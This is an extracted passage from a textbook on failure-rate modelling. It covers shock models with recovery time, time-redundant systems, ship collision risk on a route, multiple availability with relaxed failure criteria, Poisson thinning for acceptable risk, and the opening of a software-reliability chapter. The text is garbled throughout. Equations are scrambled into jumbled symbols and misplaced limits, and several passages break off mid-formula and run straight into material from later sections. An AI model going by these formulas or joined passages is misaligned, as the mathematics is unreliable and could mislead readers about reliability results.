are looking at a shock process, where a shock is fatal for a system only if it is ‘too close’ to the previous shock; otherwise the shock is harmless. As previously, assume that a shock is the only possible cause of a system’s failure. A possible interpretation of this setting is the following: when 202 Failure Rate Modelling for Reliability and Risk the time between the two consecutive shocks is too small, the system cannot recover from the consequences of the previous shock and this event results in a failure. Therefore, the time required for recovery should be taken into account. Note that the setting of the previous section can be considered as a model with an instantaneous recovery. It is natural to assume that the recovery time is a random variable. Denote this variable by τ with the Cdf R(t ) . Thus, if the shock occurs while the system is still in the process of recovery, a failure (disaster, catastrophe) occurs. Assume that shocks arrive in accordance with the non-homogeneous Poisson process with rate λr (t ) . As previously, the survival function F (t ) (the probability of a system’s failure-free performance in [0, t ) ) is of interest. Consider the following integral equation for F (t ) (Finkelstein, 2007c): t ⎫⎪⎛ ⎞ ⎧⎪ t F (t ) = exp⎨− ∫ λr (u )du ⎬⎜1 + ∫ λr (u )du ⎟ ⎜ ⎟ ⎪⎭⎝ 0 ⎪⎩ 0 ⎠ t x t−x ⎡ ⎤ ⎧⎪ y ⎫⎪ ⎧⎪ ⎫⎪ + ∫ λr ( x) exp⎨− ∫ λr (u )du ⎬⎢ ∫ λr ( y ) exp⎨− ∫ λr (u )du ⎬ R ( y ) Fˆ (t − x − y )dy ⎥ dx, (8.9) ⎪⎩ 0 ⎪⎭⎢⎣ 0 ⎪⎩ 0 ⎪⎭ ⎥⎦ 0 where the first term in the right hand side is the probability that there was no more than one shock in [0, t ) and the integrand of the second term defines the joint probability of the following events: • • • • The first shock had occurred in [ x, x + dx) ; The second shock had occurred in [ x + y, x + y + dy ) ; The time between two shocks y is sufficient for recovering (the probability of this event is R( y ) ); The system is functioning without failures in [ x + y, t ) . By Fˆ (t ) in (8.9) we denote the probability of the system’s functioning without failures in [0, t ) when the first shock occurred at t = 0 . Similar to Equation (8.9), the following integral equation with respect to Fˆ (t ) can be obtained: ⎧⎪ t ⎫⎪ t ⎧⎪ x ⎫⎪ Fˆ (t ) = exp⎨− ∫ λr (u )du ⎬ + ∫ λr ( x) exp⎨− ∫ λr (u )du ⎬ R ( x ) Fˆ (t − x )dx . ⎪⎩ 0 ⎪⎭ 0 ⎪⎩ 0 ⎪⎭ (8.10) Simultaneous Equations (8.9) and (8.10) can be solved numerically. First, Fˆ (t ) should be obtained from (8.10) and then substituted in (8.9). For the homogeneous Poisson process λr (t ) = λr , these equations can be explicitly solved via the Laplace transform. In accordance with our notation for the Laplace transform of Section 4.3.2, denote the Laplace transforms of F (t ), Fˆ (t ) and R(t ) by ∞ 0 0 F * ( s) = ∫ exp{− st ) F (t )dt , Fˆ * ( s ) = ∫ exp{− st ) Fˆ (t )dt , ‘Constructing’ the Failure Rate 203 R ∗ ( s ) = ∫ exp{− st ) R(t )dt , 0 respectively. Applying the Laplace transform to both sides of Equations (8.9) and (8.10) and using the property that the Laplace transform of a convolution is equal to the product of the Laplace transforms of the corresponding integrand functions, Fˆ * ( s ) can eventually be derived (Finkelstein, 2007c) as s[1 − λR * ( s + λr )] − λr R * ( s + λr ) + 2λr . ( s + λr ) 2 [1 − λR * ( s + λr )] 2 F * (s) = (8.11) In general, the corresponding inverse transform can be obtained numerically, whereas explicit solutions can be obtained only for simple cases. Example 8.1 Let R (t ) = 1 − exp{− μ t} . Then R * ( s + h) = μ ( s + λr )( s + λr + μ ) and F * (s) = s + 2λr + μ . 2 s + s (2λr + μ ) + λr (8.12) 2 The inverse Laplace transform results in F (t ) = A1 exp{s1t} + A2 exp{s2t} , (8.13) where s1 , s2 are the roots of the denominator in (8.12) given by s1, 2 = − (2λr + μ ) ± (2λr + μ ) 2 − 4λr 2 2 and A1 = s + 2λr + μ s1 + 2λr + μ . , A2 = − 2 s1 − s2 s1 − s 2 Equation (8.13) defines the exact solution for F (t ) . In applications, it is convenient to use simple approximate formulas. Consider the following reasonable assumption: ∞ 1 >> τ ≡ ∫ (1 − R( x))dx . (8.14) λr 0 Inequality (8.14) means that the mean interarrival time in the shock process is much larger than the mean time of recovery τ , and this is often the case in prac- 204 Failure Rate Modelling for Reliability and Risk tice. In the study of repairable systems, a similar case is usually called the fast repair approximation. The fast repair approximation in availability problems will be studied in Section 8.4. Using this assumption, Equation (8.13) can be written as the following approximate relationship: F (t ) ≈ exp{−λr τ t} , 2 (8.15) and therefore, the corresponding failure rate is approximately constant, i.e., λ (t ) ≈ λr 2τ . (8.16) On the other hand, using Assumption (8.14), Approximation (8.16) can be obtained via the per demand failure rate method (8.1)–(8.2). The probability that the next shock will occur earlier than the recovery completed is ∞ θ = ∫ λr exp{−λr x}R( x))dx , 0 which, for the case of exponential R(t ) and the corresponding fast repair condition μ >> λr , results in θ = λr μ /(λr + μ ) . Therefore, F (t ) ≈ exp{−θ λr t ) ≈ exp{−λr τ t} . 2 (8.17) The first approximation in (8.17) is due to the fact that the Poisson process is ‘stopped’ for those periods of recovery that are small in accordance with (8.14). We will discuss the accuracy of approximations of this kind in Section 8.5. Example 8.2 Let the recovery time be constant τ a > 0 . In this case, straightforward reasoning defines the survival probability as the following sum (Finkelstein, 2007c): [t /τ a ] F (t ) = exp{−λht} ∑ k =0 (h(t − (k − 1)τ a )) k , k! where [⋅] denotes the integer part. Another possible generalization of the shock models is to consider two independent shock processes: a process of harmful shocks with rate λrh and a process of healing (repair) shocks with rate λrr . Failure of the system is defined as the occurrence of two harmful events in a row. Therefore, if a harmful shock is followed by a healing one, a failure does not occur. This problem can be described mathematically by equations similar to (8.9) and (8.10) and can be solved using the Laplace transforms. On the other hand, similar to (8.17), an approximate relationship for the corresponding survival probability is given by ‘Constructing’ the Failure Rate ⎧ λ2rh F (t ) ≈ exp⎨− ⎩ λrh + λrr ⎫ ⎧ λ2 t ⎬ ≈ exp⎨− rh ⎭ ⎩ λrr 205 ⎫ t⎬ , ⎭ where the analogue of the fast repair approximation in this case is understood as λrr >> λrh . 8.2.2 Fatal and Non-fatal Failures The approach of the previous section can also be applied to obtaining reliability characteristics of repairable systems with a weaker criterion of failure. Assume that a repairable system’s failure is not considered as such (from a quality of performance point of view) if the repair time does not exceed a constant time τ a . To distinguish between these two types of malfunctions, let us call the first event a breakdown, reserving the term ‘failure’ for the final event. There are many examples of such systems. Performance of a marine navigation system, e.g., is characterized by its accuracy in obtaining navigation parameters. If a breakdown is repaired sufficiently quickly, then the corresponding latitude (or longitude) does not noticeably change and the failure of a system does not occur. The operation failure in this case occurs only when the navigation error, which increases with time of repair, exceeds a predetermined level. The repair eliminates the cause of a breakdown and resets the navigational error to a minimal level. Sometimes the described systems are called the systems with time redundancy (Zarudnij, 1973). A system with time redundancy can have the following states: • E0 – a system is operating; E1 – a system is under repair, but its duration does not exceed τ a ; E2 – a system is in the state of failure, as the repair duration exceeds τ a ; Denote by pi (t , τ a ), i = 0,1 the joint probability that the reparable system is in the state Ei at time t and that it did not fail before in [0, t ) . In accordance with our criterion of failure, the corresponding survival function is F (t ) = p0 (t ,τ a ) + p1 (t ,τ a ) . (8.18) We can proceed further analytically only after some simplifying assumptions. Let the Cdf of the time to a breakdown be exponential with the failure rate λ and the repair time be arbitrary with the Cdf G (t ) and the pdf g (t ) . Under these assumptions, using a similar reasoning to the previous section and deriving the corresponding simultaneous integral equations, it can be proved (Zarudnij, 1973) that the following equation for the Laplace transform of F (t ) holds: F * (s) = where s + λ (1 − exp{− sτ a [1 − G (τ a )] − g ∗ ( s,τ a )) , s[ s + λ − λg ∗ ( s, τ a )] (8.19) 206 Failure Rate Modelling for Reliability and Risk τa g * ( s,τ a ) = exp{− sx ) g ( y )dy (8.20) 0 is a ‘truncated’ Laplace transform. The survival probability F (t ) can be obtained using numerical methods for the inverse Laplace transform. Note that, as τ a is a constant, the denominator in (8.19) has an infinite number of roots in the complex plane. Therefore, a solution can be obtained only as an infinite series. On the other hand, we will consider now an effective asymptotic approach to obtaining F (t ) for the case of the fast repair. Therefore, assume that γ ≡ 1 − G (τ a ) t ] = F (t ) it follows that Pr[γ T > t ] = F (t / γ ) . The Laplace transform of this function is obtained directly from Equation (8.19). It can be shown after some simple transformations (Zarudnij, 1973) that as γ → 0 , uniformly in every finite interval, 1 , (8.22) γ F * (γ s) → λ s+ 1 + λτ ′ where τ ′ < τ a . In order to proceed, another reasonable assumption should be imposed: λτ a 1 | H δ (ξ ) ] = o( S (δ (ξ ))) , where H δ (ξ ) denotes the configuration of all points outside δ (ξ ) . It can be shown for an arbitrary B that N (B ) has a Poisson distribution with mean ∫λ f (ξ )dξ B and that the numbers of points in non-overlapping domains are mutually independent random variables (Cox and Isham, 1980). Our goal is to obtain a generalization of Equations (8.4) and (8.5) to the bivariate case. The idea of this generalization is in a suitable parameterization allowing us to reduce the problem to the 1-dimensional case. Assume for simplicity that λ f (ξ ) is a continuous function of ξ in an arbitrary closed circle in ℜ2 . Let Rξ1 ,ξ2 be a fixed continuous curve connecting two distinct points in the plane, ξ1 and ξ 2 . We will call Rξ1 ,ξ2 a route. A point (a ship in our application) is moving in one direction along the route. Every time it ‘crosses the point’ of the process {N ( B )} (see later the corresponding regularization), an accident (failure) can happen with a given probability. We are interested in assessing the probability of moving along Rξ1 ,ξ2 without accidents. Let r be the distance from ξ1 to the current point of the route (coordinate) and λ f (r ) denote the corresponding rate. Thus, the 1-dimensional parameterization is considered. For defining the corresponding Poisson measure, the dimensions of objects under consideration should be taken into account. Let (γ n+ (r ), γ n− (r )) be a small interval of length γ n (r ) = γ n+ (r ) + γ n− (r ) in a normal direction to Rξ1 ,ξ2 at the point with the coordinate r , where the upper index denotes the corresponding direction ( γ n+ (r ) is on one side of Rξ1 ,ξ2 , whereas γ n− (r ) is on the other). Let R ≡| Rξ1ξ2 | be the length of Rξ1 ,ξ2 and assume that the interval is small compared with the length of the route, i.e., R >> γ n (r ), ∀r ∈ [0, R ] . The interval (γ n+ (r ), γ n− (r )) is moving along Rξ1 ,ξ2 , crossing points of a random field. For “safety at sea” applications, it is reasonable to assume the symmetrical (γ n+ (r ) = γ n− (r )) structure of the interval with length γ n (r ) = 2δ s + 2δ o (r ) , where 2δ s , 2δ o (r ) are the diameters of the ship and of an obstacle, respectively. For simplicity, we assume that all obstacles have the same diameter. Thus, the ship’s dimensions are already ‘included’ in the length of our equivalent interval. There ‘Constructing’ the Failure Rate 209 can be other models as well, e.g., the diameter of an obstacle can be considered a random variable. Taking Equation (8.24) into account, the equivalent rate of occurrence of points, λe, f (r ) is defined as λe f (r ) = lim Δr → 0 E [N (B (r , Δr , γ n (r ) )] , Δr (8.25) where N ( B (r , Δr , γ n (r )) is the random number of points crossed by the interval γ n (r ) when moving from r to r + Δr . Thus, the specific domain in this case is defined as an area covered by the interval moving from r to r + Δr . When Δr → 0 , γ n (r ) → 0 , and taking into account that λ f (ξ ) is a continuous function (Finkelstein, 2003), E [N (B(r , Δr , γ n (r ) )] = ∫λ f (ξ )dS (δ (ξ ) ) B ( r ,Δr ,γ n ( r ) ) = γ n (r )λ f (r )dr [1 + o(1)] , which leads to the expected relationship for the equivalent rate of the corresponding 1-dimensional non-homogeneous Poisson process, i.e., λe f (r ) = γ n (r )λ f (r )[1 + o(1)] , Δr → 0, γ n (r ) → 0 . (8.26) As the radius of curvature of the route Rc (r ) is sufficiently large compared with γ n (r ) , i.e., γ n (r ) R } = exp⎨− λa f (r )dr ⎬ , ⎪⎩ 0 ⎪⎭ (8.27) where λ a f ( r ) ≡ θ f ( r ) λe f ( r ) (8.28) 210 Failure Rate Modelling for Reliability and Risk is the corresponding failure (accident) rate. Thus, we have constructed the analogue of the per demand failure rate. As previously, Equations (8.27) and (8.28) constitute a simple and convenient tool for obtaining probabilities of safe (reliable) performance. 8.3.2 Crossing the Line Process The content of this topic requires a more advanced mathematical background (spatial-temporal point processes and elements of stochastic geometry), and therefore this section may be omitted by the less mathematically oriented reader. Consider a random process of continuous curves in the plane to be called paths. In the “safety at sea” application, the ship’s routes in the sea chart represent paths, whereas the rate of stochastic processes to be defined represents the intensity of navigation in the given sea area. A specific case of stationary random lines in the plane to be considered as our model is called a stationary line process. Thus, for simplicity, the route of a ship will be modelled by a line in the plane. It is convenient to characterize a line in the plane by its ( ρ ,ψ ) coordinates, where ρ is a perpendicular distance from the line to a fixed origin and ψ is the angle between this perpendicular line and a fixed reference direction. The following observation is very helpful and connects a line process with a point process, which is important for our discussion. A random process of undirected lines can be defined as a point process on the cylinder ℜ + × S , where ℜ + = (0, ∞) and S denotes the interval (0, 2π ] . Therefore, each point on the cylinder is equivalent to the line in ℜ2 . The following result is obtained in Daley and Vere-Jones (1988). Theorem 8.1. Let V be a fixed line in ℜ2 with coordinates ( ρ v , α ) and let NV be a point process on V generated by its intersections with a stationary line process. Then NV is a stationary point process on V with rate λV given by λV = λ ∫ cos(ψ − α ) P(dψ ) , (8.29) S where λ is the constant rate of a stationary line process and P (dψ ) is the probability that an arbitrary line has orientation in [ψ ,ψ + dψ ) . If the line process is isotropic, then λV = 2λ / π . The rate λ is induced by a random measure defined by the total length of lines inside any closed bounded convex set in ℜ2 . One cannot define the corresponding measure as the number of lines intersecting the above-mentioned set, because in this case, it will not be additive, as the same line can intersect several domains in the set. The importance of this theorem is that it makes the useful connection between the line process and the corresponding point process on V . Assume that a line process is a homogeneous Poisson process. This means that the point process NV generated by its intersections with an arbitrary line V is a Poisson point process. Consider now a stationary-temporal Poisson line process in the plane. Similar to NV , the Poisson point process {NV (t ), t > 0} of its intersections with V in time can be defined. The constant rate of this process λV (1) defines the probability of ‘Constructing’ the Failure Rate 211 intersection (with a line from a temporal line process) of an interval of unit length in V during a unit interval of time (given these units are sufficiently small). As previously, λV (1) = 2λ (1) / π for the isotropic case. Having defined all necessary notions, we can proceed now with obtaining the rate of intersections. Let Vξ1 ,ξ2 be a finite line route, connecting ξ1 and ξ 2 in ℜ2 and let r , as in the previous section, be the distance from ξ1 to the current point of Vξ1 ,ξ2 . Then λV (1)drdt can be interpreted as the (approximate) probability of intersecting Vξ1 ,ξ2 by the temporal line process in (r , r + dr ) × (t , t + dt ); ∀r ∈ (0, R ), t > 0. A point (a ship) starts moving along Vξ1 ,ξ2 at ξ1 , t = 0 with a given speed v(t ) . We assume that an accident happens with a given probability when it intersects the line from the temporal line process. Note that intersections in Section 8.4.1 were time-independent, as the obstacles were not moving. A regularization procedure, involving dimensions (of a ship, in particular) can be performed, e.g., in the following way. Define the ‘attraction interval’ (r − γ ta− , r + γ ta+ ) ⊂ Vξ1 ,ξ2 , γ ta+ , γ ta- ≥ 0, γ ta (r ) = γ ta+ + γ ta− > >> t >> 1 μ , ( λ μ −1 (Assumption (8.43)) the second term on the right-hand side of the exact formula (8.40) is negligible. The corresponding error δ is defined as ⎧ λλ t ⎫ s δ = 2 exp{s1t} − exp⎨− d ⎬ . s2 − s1 ⎩ λ+μ⎭ Using Assumption (8.41) for expanding s1 and s 2 in series ( λ / μ → 0 ) and Assumption (8.42) for further simplification eventually results in (Finkelstein and Zarudnij, 2006) δ= λλd (1 + λd t )(1 + o(1)) . μ2 (8.45) The general case of arbitrary distributions of the time to failure with mean T and of the time to repair with mean τ can also be considered using assumptions similar to Assumptions (8.41)–(8.43). This is because the stationary value of availability A for a general alternating renewal process is equal to τ /(T + τ ) and, 218 Failure Rate Modelling for Reliability and Risk therefore, depends only on the corresponding mean values. Relationship (8.44) in this case becomes ⎧⎪ t ⎫⎪ Am (t ) ≡ exp⎨− λ (u )du ⎬ . ⎪⎩ 0 ⎪⎭ ⎧ τλ t ⎫ ≈ exp{− (1 − A)λd t} = exp⎨− d ⎬ . ⎩ T +τ ⎭ Furthermore, the method of the per demand failure rate can be generalized to the non-homogeneous Poisson process of demands. In this case, as follows from Equation (8.4), λd t should be substituted by t Λ d (t ) = λd (u )du . 0 It is difficult to estimate the error of approximation for the case of arbitrary distributions, as was done in the exponential case. Taking into account the corresponding heuristic reasoning, we can expect that this error will have the same ‘structure’ as in Equation (8.45), where 1 / μ and 1 / λ should be replaced by τ and T , respectively. 8.4.3 Two Consecutive Non-serviced Demands The strong criterion of failure given by Definition 8.2 can be naturally relaxed in the following way (Finkelstein and Zarudnij, 2002). Definition 8.3. The failure of a repairable system that services stochastic demands occurs when a system is in the repair state at two consecutive moments of demand. In accordance with this definition, multiple availability Am( 2 ) (t ) of a system is the probability of operating without failures in [0, t ). As stated earlier, this setting can be quite typical for some information-processing systems. If, for example, a scheduled ‘correction’ of a navigation system via a satellite fails (the system was unavailable), we can still wait for the next correction, but usually not more. Similar to (8.38), the following integral equation with respect to Am( 2 ) (t ) is obtained: Am( 2 ) (t ) = exp{−λd t} t + λd exp{−λd x} A( x) Am2 (t − x)dx 0 t t−x 0 0 ~ + [λd exp{−λd x}(1 − A( x)) λd exp{−λd y}A( y ) Am( 2) (t − x − y )dy ]dx , (8.46) ‘Constructing’ the Failure Rate 219 ~ where A(t ) is the availability of the system at t given that at t = 0 the system was in the repair state, i.e., ~ A(t ) = μ μ +λ μ μ +λ exp{−(λ + μ )t} . The first two terms on the right-hand side of (8.46) have a similar meaning to Equation (8.38), whereas the third term defines the joint probability of the following events: • Occurrence of the first demand in [ x, x + dx) ; The system is in the repair state at x (with probability 1 − A( x) ); • • Occurrence of the second demand in [ x + y, x + y + dy ) ; The system is in the operational state at x + y , whereas it was in the repair ~ state at the previous demand (with probability A( y ) ); The system operates without failures in [ x + y, t ) (with probability Am( 2 ) (t − x − y ) ). Equation (8.46) can also be solved via the Laplace transform. After elementary transformations: Am( 2)∗ ( s ) = = ( s + λd )( s + λd + λ + μ ) 2 s ( s + λd )( s + λd + λ + μ ) 2 + sλd λ ( s + 2λd + λ + μ ) + λ2d λ (λd + λ ) Ρ3 ( s ) Ρ4 ( s ) , (8.47) where P3 ( s ) and P4 ( s ) denote the corresponding polynomials in the numerator and the denominator, respectively. The inverse transformation results in Am( 2) (t ) = 4 ∑ P′(s ) exp{s t} , P3 ( si ) i 1 4 (8.48) i where P4′( s ) is the derivative of P4 ( s ) and si , i = 1,2,3,4 are the roots of the denominator in (8.47), i.e., Ρ4 ( s ) = 4 ∑b s k 4−k =0 0 and bk are defined as b0 = 1, b1 = 2λ + 2 μ + 3λd , b2 = (λd + λ + μ )(3λd + λ + μ ) + λd λ , b3 = λd [(λd + λ + μ ) 2 + λ (λd + λ + μ ) + λ (λd + λ )], b4 = λ2d λ (λd + λ ). (8.49) 220 Failure Rate Modelling for Reliability and Risk Equation (8.48) defines the exact solution of the problem. The solution can also be obtained numerically by solving Equation (8.49) and substituting the corresponding roots in (8.48). As in the previous section, a simple, approximate formula based on the method of the per demand failure rate can also be used. Let Assumptions (8.41)–(8.43) hold. All bk , k = 0,1,2,3,4 in Equation (8.49) are positive, which means that there are no positive roots for this equation. Consider the smallest root in absolute value, s1 . Owing to assumption (8.41): s1 ≈ − λλ (λ + λ ) b4 ≈− d 2 d , μ b3 Ρ3 ( s1 ) ≈ 1. Ρ4′ ( s1 ) It can also be shown that the absolute values of other roots are much larger than | s1 | . Thus, Equation (8.48) can be written as the following fast repair exponential approximation: ⎧ λλ (λ + λ ) ⎫ Am2 (t ) ≈ exp⎨− d 2 d t ⎬ . μ ⎩ ⎭ (8.50) It is difficult to assess the corresponding approximation error directly, as was done in the previous section, because the root s1 is also defined approximately. On the other hand, the method of the per demand failure rate can be used for obtaining Am( 2 ) (t ) . Similar to (8.44), ⎧⎪ t ⎪⎫ Am( 2 ) (t ) = exp⎨− ∫ λ (u )du ⎬ ⎪⎩ 0 ⎪⎭ ⎧ μλ2 λd t ⎫ . ≈ exp − A(1 − A) 2 λd t = exp⎨− 3⎬ ⎩ (λ + μ ) ⎭ { } (8.51) Indeed, failure occurs in [t , t + dt ) if a demand occurs in this interval (with probability λd dt ) and the system is unavailable at this moment of time and at the moment of the previous demand, whereas it was available at the demand prior to the latter one. Owing to the fast repair assumptions (8.41) and (8.42), this probability is~ approximately equal to ( μλ (λ + μ ))3 , as the stationary values of A(t ) and A(t ) are both equal to μ /(λ + μ ) . Taking again into account these assumptions, we observe that Approximations (8.50) and (8.51) are really ‘close’. As in Section 8.4.2, the generalization to arbitrary distributions with finite means is performed, i.e., ⎧ λ T τ 2t ⎫ Am2 (t ) ≈ exp − A(1 − A) 2 λd t = exp⎨− d . 3⎬ ⎩ (T + τ ) ⎭ { } (8.52) ‘Constructing’ the Failure Rate 221 8.4.4 Other Weaker Criteria of Failure The case of not more than N non-serviced demands in [0, t ) (not necessarily consecutive) is also considered in a similar manner (Finkelstein and Zarudnij, 2002). The failure in this case is described by the following definition. Definition 8.4. The failure of a repairable system occurs when more than N ≥ 1 demands are non-serviced in [0, t ) . Denote the corresponding probability of the failure-free operation by Am, N (t ) . Cumbersome integral equations can be derived (Finkelstein and Zarudnij, 2002) and solved in terms of the corresponding Laplace transforms. The Laplace transform of Am, N (t ) should then be inverted using numerical methods. On the other hand, the fast repair approximation, as previously, allows for the simple heuristic approach. Consider the point process of moments of unavailability on demand of our system. As follows from (8.44), this point process can be approximated by the Poisson process with the rate (1 − A)λd . This leads to the following approximate result for arbitrary (not very large) N : n ⎧ λλd ⎫ N 1 ⎛ λλd ⎞ Am, N (t ) ≈ exp⎨− t ⎬∑ ⎜⎜ t ⎟⎟ , N = 1,2,... . ⎩ λ + μ ⎭ n = 0 n! ⎝ λ + μ ⎠ (8.53) Thus, a rather complicated problem has been immediately solved via the Poisson approximation, based on the per demand failure rate λλd (λ + μ ) −1 . When N = 0 , we arrive at the case of ordinary multiple availability: Am,0 (t ) ≡ Am (t ) . Another weaker definition of failure is based on the time redundancy concept discussed for a different setting in Section 8.2.2. Definition 8.5. The failure of a repairable system that services stochastic demands, occurs when the repair action is not completed in time τ a > 0 . As previously, the corresponding multiple availability Am,τ (t ) is defined as the probability of a system functioning without failures in [0, t ) . Definition 8.5 means that if a demand occurs when the system is in a state of repair, which is completed within (remaining) time τ a > 0 , then this event is not qualified as a failure of a system. Therefore, the delay τ a is considered to be acceptable. Note that if τ a = 0 , then Am,τ (t ) = Am (t ) . To obtain a simple approximate formula by means of the method of the per demand failure rate, as in the previous case, consider the Poisson process with rate (1 − A)λd , which approximates the point process of the non-serviced demands. In accordance with Equations (8.2) and (8.3), multiplying the rate of this initial process by the probability of ‘failure on demand’, i.e., exp{− μτ a } , the corresponding 222 Failure Rate Modelling for Reliability and Risk failure rate can be obtained (Finkelstein and Zarudnij, 2002) as Am,τ (t ) ≈ exp{− λd (1 − A)(exp{− μτ a })t} ⎧ λλd t ⎫ exp{− μτ a } ⎬ . = exp⎨− ⎩ λ+μ ⎭ 8.5 Acceptable Risk and Thinning of the Poisson Process In this section, we will consider a simple example of the operation of thinning for the Poisson process of shocks with rate λr (t ) (Finkelstein, 2007c). Example 8.4 Assume that each shock causes a random loss Ci . Let Ci , i = 1,2,... be i.i.d. random variables with the continuous Cdf G (c), c ≥ 0 . Our interest is in considering the overall consequences of shocks in [0, t ) . Divide the c -axis into n regions, i.e., [0, c1 ), [c1 , c2 ),..., [cn−1 , ∞) . The probability that the loss from a single shock does not exceed the level ci is G (ci ) , and the probability that it is in the region [ci , c j ), i < j; i, j < n; cn ≡ ∞ is pi , j = G (c j ) − G (ci ), pi ,n = 1 − G (ci ), pi ,0 = G (ci ) − G (0) = G (ci ). The first step is to derive the probability Pj (t ) that all events that occurred in (0, t ] resulted in a loss not exceeding ci . In accordance with Equation (8.4), this probability can be defined as ⎧⎪ t ⎪⎫ Pi (t ) = exp⎨− ∫ (1 − pi , 0 )λr ( x)dx ⎬ . ⎪⎩ 0 ⎪⎭ (8.54) Similar to (8.54), the probability that all events resulted in a loss in a range of ci to c j is ⎧⎪ t ⎫⎪ Pi , j (t ) = exp⎨− ∫ (1 − pi , j )λr ( x)dx ⎬ . ⎪⎩ 0 ⎪⎭ Specifically, for the three regions: ⎧⎪ t ⎪⎫ Ps (t ) = exp⎨− ∫ (1 − ps )λr ( x)dx ⎬, ⎪⎩ 0 ⎪⎭ ⎧⎪ t ⎪⎫ Ps ,u (t ) = exp⎨− ∫ (1 − ps ,u )λr ( x)dx ⎬ ⎪⎩ 0 ⎪⎭ ⎧⎪ t ⎫⎪ Pu (t ) = exp⎨− ∫ (1 − pu )λr ( x)dx ⎬ , ⎪⎩ 0 ⎪⎭ (8.55) ‘Constructing’ the Failure Rate 223 where Ps (t ) is the probability that all events from the Poisson process in [0, t ) result in a ‘safe loss’; Ps ,u (t ) denotes the probability that all events result in a loss in [cs , cu ) . Eventually, Pu (t ) denotes the supplementary probability that all events result in a loss in the region [cu , ∞). The strongest criterion of the corresponding acceptable risk is when all events result in a loss from the first region. It is reasonable to consider a weaker version of this acceptance criterion allowing, for example, not more than k = 1,2,... events to result in a loss from the intermediate region [cs , cu ) (an event in [cu , ∞) is ‘not allowed’ at all). For simplicity, let the underlying process be the homogeneous process with rate λr . It is clear (Ross, 1996) that this process can be split into three Poisson processes with rates λr ps , λr ps ,u , λr pu . Due to our acceptable risk criterion, the risk in [0, t ) is considered unacceptable if at least one event occurs from the process with rate λr pu or if more than k events occur from the process with rate λr ps ,u . These considerations lead to the following equation for the probability of safe (with acceptable risk) performance: k Ps ,k (t ) = exp{−λr pu t} exp{−λr ps ,u t}∑ 0 (λr ps ,u t ) i i! . When there is no intermediate region, cu = cs and we arrive at Ps , 0 (t ) ≡ Ps (t ) = exp{ − λ r p u t} = exp{ − λ r (1 − p s ) t} , which coincides with the first equation in (8.55). 8.6 Chapter Summary In this chapter, we have considered several meaningful examples of application of the concept of the per demand failure rate to different reliability problems. A basic feature of all models is an underlying point process of events that can be terminated in some way. Termination usually means the failure of a system or a mission failure. When the underlying process is a homogeneous (or non-homogeneous) Poisson process, the corresponding failure rate can be ‘constructed’ and, therefore, the probability of termination can usually be obtained in an explicit way. Termination of renewal processes, however, cannot be modelled explicitly, and only bounds and approximations exist for reliability measures of interest. In Sections 8.2 and 8.4, we consider the weaker criteria of failure when, e.g., not every event from the underlying process can result in the failure of a system or when these events should not be too close in time. The solutions are obtained in terms of the corresponding Laplace transforms, but effective and simple approximate results are derived via the method of the per demand failure rate. In Section 8.3 the developed 1-dimensional approach is applied to obtain the survival probability of an object moving in the plane and encountering moving or (and) fixed obstacles. In the “safety at sea” application terminology, each founder- 224 Failure Rate Modelling for Reliability and Risk ing or collision results in a failure (accident) with a predetermined probability. It is shown that this setting can be reduced to the 1-dimensional setting, which is suitable for applying the method of the per demand failure rate. 9 Failure Rate of Software 9.1 Introduction This chapter is devoted to software reliability modelling and, specifically, to a discussion of some of the software failure rate models. It should not be considered a comprehensive study of the subject, but rather a brief illustration of the methods and approaches of the previous chapters. In Section 9.2, for instance, we consider several well-known ‘empirical’ models for software failure rates that can be described in terms of the corresponding stochastic intensity processes defined and studied in Chapters 4 and 5. In Section 9.3, a different approach is presented based on a stochastic model similar to the model used for constructing the failure rate for spatial survival in Section 8.3 (Finkelstein, 1999c). For a more detailed basic treatment of software reliability issues, the reader is referred to, e.g., the books of Musa et al. (1987), Xie (1991), Pham (2000) and Singpurwalla and Wilson (1999). Assessing software reliability is not easy. Perhaps the major difficulty is that we are concerned primarily with design faults, which is a very different situation from that considered by conventional hardware reliability theory. A fault (or bug) refers to a manifestation of a mistake in the code made by a programmer or designer with respect to the specification of the software (Ledoux, 2003). Similar to hardware reliability, software reliability is defined in Singpurwalla and Wilson (1999) as the probability of failure-free operation of a computer code for a specified mission time in a specified input environment. Activation of a fault by an input value leads to an incorrect output that is a failure. There are two major causes of randomness in software reliability models, i.e., the unknown ‘locations’ of bugs and the random nature of input values. Therefore, the stochastic modelling of software reliability can be justified by these factors. Define a software program as a set of complete machine instructions that executes within a single computer and accomplishes a specific function (Musa et al., 1987). It can formally be described as the following mapping: G X →Y , where X and Y are input and output domains, respectively, and G is a function that maps each x ∈ X onto a single y ∈ Y . A fault (bug) is defined as a defect of a 226 Failure Rate Modelling for Reliability and Risk program that causes one or more values of the input domain to be mapped into incorrect values of the output domain. Denote the set of all faults by X f . In real applications, the factors that cause the selection of a particular input value are numerous and complex. The crucial role for the corresponding probabilistic analysis is played by the operational profile p ( x ) (Pasquini et al., 1996). Assume for simplicity that X is a domain in the Euclidian space X ⊂ ℜ m . The value p( x )dx ≡ p ( x1 , x2 ,..., xm )dx1...dxm is interpreted as the probability of choosing an input value in the m -dimensional parallelepiped [ x , x + dx ] . Note that the time, which usually defines a real operational profile, is not a part of the model yet. This case will be considered in Section 9.3. In accordance with the given definitions, the following integral: Cf = ∫ p( x )dx (9.1) Xf can be viewed as a measure of software reliability as it takes into account the total volume of bugs in a program and probabilities of choosing these faults by a program. As the total volume of ‘faulty inputs’ is usually much smaller than the volume of the entire X , the following assumption is reasonable: C f S1 , etc. As a bug is removed and the program is corrected, it is reasonable to assume that the length of the subsequent cycle is larger (in some suitable stochastic sense) than the length of a previous cycle. For example, the geometric process of Section 4.3.3 for a < 1 can be considered as the corresponding sequence of the stochastically increasing cycle durations. Note that debugging can also be imperfect, i.e., new bugs can be ‘created’ during this operation. In this chapter, for simplicity, we only consider the case of the perfect debugging. Failure Rate of Software 227 9.2.1 The Jelinski–Moranda Model This model is probably one of the first meaningful models of software reliability. It has also formed the basis for several other models that have been developed later. Jelinski and Moranda (1972) assume that software contains an unknown number of initial bugs N and that each time software fails, a bug is detected and instantaneously corrected. Each bug has an ‘independent input’ of size λ > 0 into the failure rate of the software. Thus, the first cycle is characterized by the failure rate Nλ , the failure rate at the second cycle is ( N − 1)λ and the failure rate at the i th cycle is defined by the number of remaining bugs in the program, i.e., λ ( N − i + 1) . The process stops when no bugs are left in the program. As previously, Si denotes the arrival time of the i th failure with realizations si , i = 1,2,... . Therefore, the intensity process (stochastic intensity) and the CIF for this process, similar to Equations (4.13) and (4.14), are N λt = ∑ λ ( N − i + 1) I ( S i−1 ≤ t < S i ), t ≥ 0 , (9.2) i ≥1 